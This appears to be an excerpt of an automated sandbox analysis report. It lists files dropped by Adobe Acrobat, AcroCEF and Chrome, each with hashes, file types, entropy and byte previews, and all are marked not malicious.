                                                                SHA-512:5CF296C8E4D8DFF4F96DB1EC01AD484117DA7E75B8F082FD253780A75D4CB869993EA2129E75C7D467B7E6A8C6D063BE9A7EBAC0271286FD5463B5F9925E6514
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):282
                                                                Entropy (8bit):5.296623633935944
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HX2zUV6d/5IRR4UhUR0YjxoAvJTqgFCrPeUkwRe9:YvXKX2zUV6FWRuUhUfOGTq16Ukee9
                                                                MD5:F31468193B67347AE2D69B073A6A2DD8
                                                                SHA1:700F284F454E8F1BD62F9AB9678A089EC0F38D16
                                                                SHA-256:C3AD07474B6B67F077850099E52B6CEB6A9A40F7671B128A6F888CD195DD2DD3
                                                                SHA-512:7CA1F015205FA4C75A4035323F3F32A46F715C48DF8C2A52A5B9200D3589FA739C8B71FBC54CF927EB4F1692B9DDF227E74DAE69BF649234EA91D6F0CB3FF910
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"a3c3191b-3250-4475-a101-8d3d3db5bb8c","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1736460912056,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):0.8112781244591328
                                                                Encrypted:false
                                                                SSDEEP:3:e:e
                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                Malicious:false
                                                                Preview:....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):2814
                                                                Entropy (8bit):5.142897091278909
                                                                Encrypted:false
                                                                SSDEEP:24:YPIaRpayx9VJwBOlq+Umz39NgcwlcsjBvj0S0FnV82BBnN2LSGCQnABSf5Zk9caT:YBl9VjlFDTiNVzKhNArnABOg9J
                                                                MD5:51114EAC85E935C2F4ABC4E616DD175E
                                                                SHA1:98600D9C3C0489EF304CE1C000403CE151F1CFB2
                                                                SHA-256:6546AA750F09462B3A9E5746A6C4781F79537C286A8E68E51892F839BBB5D251
                                                                SHA-512:2C48A0C44A87C9819BAAEE4601CF7FF01574E5762FFF7072C1FB9AFB650FFED518AB1BBAC68BA137BC0B79021F617301DE45A114B64729B8296CDE192D8F51BF
                                                                Malicious:false
                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ce9dbf6aaa6d3cb91e4a6ccce0f79106","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736285681000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f9478b5600d05e75ced302a2de03ca7b","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736285681000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"233efc592929426a2a02e1acb09473c5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736285681000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e9d6b1fc237fdf198c303aa7d838683e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736285681000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"8e3b396a3dcd7c1bdd3efbedbc26aa1f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736285681000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"6a7b0e0304ef2286cc84fcbfcb7b181d","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                Category:dropped
                                                                Size (bytes):12288
                                                                Entropy (8bit):0.9893373530341989
                                                                Encrypted:false
                                                                SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QeHJ0IcLESiAiefJ0F:TVl2GL7ms67YXtrNcI8S
                                                                MD5:3EE96AF0156D970251256CBD6BB914F8
                                                                SHA1:107CA6842E81D99D4E91CE1C487F0BF505214AD6
                                                                SHA-256:1208A095B46E0A1A9FD22E6328772DFFF6219D8B107EC01D2DEB31A9AF16CB2B
                                                                SHA-512:826658623BFCD6576AED82DEB3503B78683DA6EF806BC7FD20852440F11BBBC3E837C25353E04627E09799D5ACAB1A4D1A29A954E5A7428897D0FEC3CB59506D
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):8720
                                                                Entropy (8bit):1.3442269703422758
                                                                Encrypted:false
                                                                SSDEEP:24:7+tNASY9QmQ6QeHJ07cLESiAi0mY9QHqLBx/XYKQvGJF7urs6r:7MNlYXtrCcI8KY+qll2GL7ms6r
                                                                MD5:9B87EDA25A2BA89C0AD9E7F4C53304E1
                                                                SHA1:D2719ECFD783F1873E3EAE1BEF4AC705AC740E3A
                                                                SHA-256:3607A3E0E2537A3C3174E7E930E013E6C5F2D45F555F694F15640942291FFEFC
                                                                SHA-512:9CF07C5224819D47AC375517BBDAEDC4C75290407172423EDB20078041570E6AE3259428BBB803DA103A7FCE48F867E363D421EE0F41301399C18B727C6A4D80
                                                                Malicious:false
                                                                Preview:.... .c.......5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):66726
                                                                Entropy (8bit):5.392739213842091
                                                                Encrypted:false
                                                                SSDEEP:768:RNOpblrU6TBH44ADKZEgcwnaLk3r8Yoh2vmUMm3SAS2BYyu:6a6TZ44ADEikb8YosvmY/NK
                                                                MD5:8915B87D3A25B53F57201FC89C780FC6
                                                                SHA1:D3BA45E03C4AB6EDA14806F231A2B767A5761E3C
                                                                SHA-256:AF2A1493F2DB5CE675EF734B713C63FE36D3DC06F14B560A88D3F7A2094A21C9
                                                                SHA-512:978C815818BD02C00F0E37452DF9D0BEBC3F44EF16A827A7850D90FEF254B5352AF70D00F3B50AC754916DF9BF23F6E31E014B7623E008EA866CCE14E0F74CC3
                                                                Malicious:false
                                                                Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):246
                                                                Entropy (8bit):3.536003181970279
                                                                Encrypted:false
                                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQpClErN2INlH:Qw946cPbiOxDlbYnuRKTWDrNfN9
                                                                MD5:6167D06EBA7E8AF80ADD0CD08C6D4675
                                                                SHA1:B99F1CCB6A2BBCF6BB5A88C6C851E674B15EDBC5
                                                                SHA-256:E743404A8EAA2BBE859B81C36E0C333B6AACB310A5F87B0C487B6DE36D4CAB1A
                                                                SHA-512:E92FCFE5F762CEF7BBBEEFA8035D3C0A34CF67BC6901F0F23FD9C15E92A464A5D67AB53FD9179F525B9B22D4AD558A5765289E36FB019179FB4366C7B5634778
                                                                Malicious:false
                                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.0.1./.2.0.2.5. . .1.6.:.3.4.:.4.3. .=.=.=.....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PDF document, version 1.6, 0 pages
                                                                Category:dropped
                                                                Size (bytes):358
                                                                Entropy (8bit):5.092465004662048
                                                                Encrypted:false
                                                                SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOyc1Fbtc1FbRLCSyAAO:IngVMre9T0HQIDmy9g06JXiE5EdLlX
                                                                MD5:D8D323EA69EC70F51ED1BBC2F1952CE7
                                                                SHA1:07D9E9561FF9083548F143AA1C90FE4DFBD6865E
                                                                SHA-256:DF184AA790B88CD24735E274AF0E5A887C5EA44CDA22B5B1D38F75A79661CD79
                                                                SHA-512:A8B30051268ABE60B0E3CAB1BA112C25B24E370C05B91D564FC6061F7401A8524F00508EE20E4FE028BC65E80AB918E66CCDC9C4E495AAD1D477DE222B03091A
                                                                Malicious:false
                                                                Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<B3C2F8C929088541AB7A3A29564DAD53><B3C2F8C929088541AB7A3A29564DAD53>]>>..startxref..127..%%EOF..
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with very long lines (393)
                                                                Category:dropped
                                                                Size (bytes):16525
                                                                Entropy (8bit):5.353642815103214
                                                                Encrypted:false
                                                                SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                Malicious:false
                                                                Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):16603
                                                                Entropy (8bit):5.342137117477924
                                                                Encrypted:false
                                                                SSDEEP:384:wfN6lrcvXri4lvhsDQFda04kgLubOBRiH8HzRJ54Ni8j1tzv/47QReRs5Gwx2XfF:QfeF
                                                                MD5:7AD89DD016289B662007D6F6E9F42F76
                                                                SHA1:D4A30F0710001D2479D7AC4CA98EA17564F94616
                                                                SHA-256:A9384C4455B5B65EED7B43984FEFB8B9AA4FA8B98E5A78B09255CF5BECB9A525
                                                                SHA-512:C4A4C7BC5E7B2BDF01B5D8C62E9570DBF9658ECABC35CE822A337297058482F26344B0C645133DADC3E25378635059B6A40C907F09611DE9547436F71E948939
                                                                Malicious:false
                                                                Preview:SessionID=15af2546-b5d4-4ee4-a245-07af3ed3c185.1736285678153 Timestamp=2025-01-07T16:34:38:153-0500 ThreadID=7104 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=15af2546-b5d4-4ee4-a245-07af3ed3c185.1736285678153 Timestamp=2025-01-07T16:34:38:155-0500 ThreadID=7104 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=15af2546-b5d4-4ee4-a245-07af3ed3c185.1736285678153 Timestamp=2025-01-07T16:34:38:155-0500 ThreadID=7104 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=15af2546-b5d4-4ee4-a245-07af3ed3c185.1736285678153 Timestamp=2025-01-07T16:34:38:155-0500 ThreadID=7104 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=15af2546-b5d4-4ee4-a245-07af3ed3c185.1736285678153 Timestamp=2025-01-07T16:34:38:155-0500 ThreadID=7104 Component=ngl-lib_NglAppLib Description="SetConf
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):29845
                                                                Entropy (8bit):5.42108042220435
                                                                Encrypted:false
                                                                SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcbgcbQIBncbO:fhWlA/TVuB5
                                                                MD5:60EEED01F0D28768A78918067A72EE27
                                                                SHA1:5F9E556EA96CD31E0F1CF3D93928E687D99FF898
                                                                SHA-256:486EECAD5DF974532609D1FFD21F11BD1AE318A6C9373E9921C0078E1A1D00A1
                                                                SHA-512:C5F0CD2715608BF7F6B087982B10645782AF8976FDEF2BF642F258F7A2EFE26E2C666C464EF8AB163990CEA55387F36CA44044B1E467C8371BB9273584FFE469
                                                                Malicious:false
                                                                Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                Category:dropped
                                                                Size (bytes):386528
                                                                Entropy (8bit):7.9736851559892425
                                                                Encrypted:false
                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                Malicious:false
                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                Category:dropped
                                                                Size (bytes):1407294
                                                                Entropy (8bit):7.97605879016224
                                                                Encrypted:false
                                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                Malicious:false
                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                Category:dropped
                                                                Size (bytes):758601
                                                                Entropy (8bit):7.98639316555857
                                                                Encrypted:false
                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                MD5:3A49135134665364308390AC398006F1
                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                Malicious:false
                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                Category:dropped
                                                                Size (bytes):1419751
                                                                Entropy (8bit):7.976496077007677
                                                                Encrypted:false
                                                                SSDEEP:24576:/x0WL07oDGZswYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:J0WLxDGZswZGM3mlind9i4ufFXpAXkru
                                                                MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                                                                SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                                                                SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                                                                SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                                                                Malicious:false
                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 20:35:59 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2673
                                                                Entropy (8bit):3.990622411753607
                                                                Encrypted:false
                                                                SSDEEP:48:8mdrTz3qHUidAKZdA1FehwiZUklqehgy+3:8ivR3y
                                                                MD5:16D885723260A59443FAF284DA797D9D
                                                                SHA1:7E7442667094CC2408ED35179AC616A595C023A7
                                                                SHA-256:C67386BF3CC51CC465C918B2D443D5A500A8C324106D5D0DD98EF802752F6087
                                                                SHA-512:FA8BEF5942EA8C91EEBA6D11294D33CCC84882713A8C96FF2099BFB2611192C68AB8826BC6A52E3523ED525AB1F0D187C12B2FF65F19242D06CAF1D2CF6D6CC8
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,....l..$La..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I'ZJ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V'Z}.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V'Z}.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V'Z}............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V'Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............./M.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 7 20:35:59 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2675
                                                                Entropy (8bit):4.009261997578968
                                                                Encrypted:false
                                                                SSDEEP:48:8qdrTz3qHUidAKZdA1seh/iZUkAQkqehny+2:8OvH9QKy
                                                                MD5:DD2F9A686A268486E0C020389513AB5F
                                                                SHA1:0402617C80515777BF5D4B5D8D2F091E0EBC9F84
                                                                SHA-256:209184C00125680AFF670A95437EB8DCE5F843D2E821C8249A784A5C67F1CF24
                                                                SHA-512:20FFFFEA402F02E26FFC090EDBCE47197D850C9C141F3F8C44586FD74FD055D94C6D6BD768DA33B2F9C0F9E03DC7EE333F6F049E6F6E73D688561CFE4364DDC9
                                                                Malicious:false
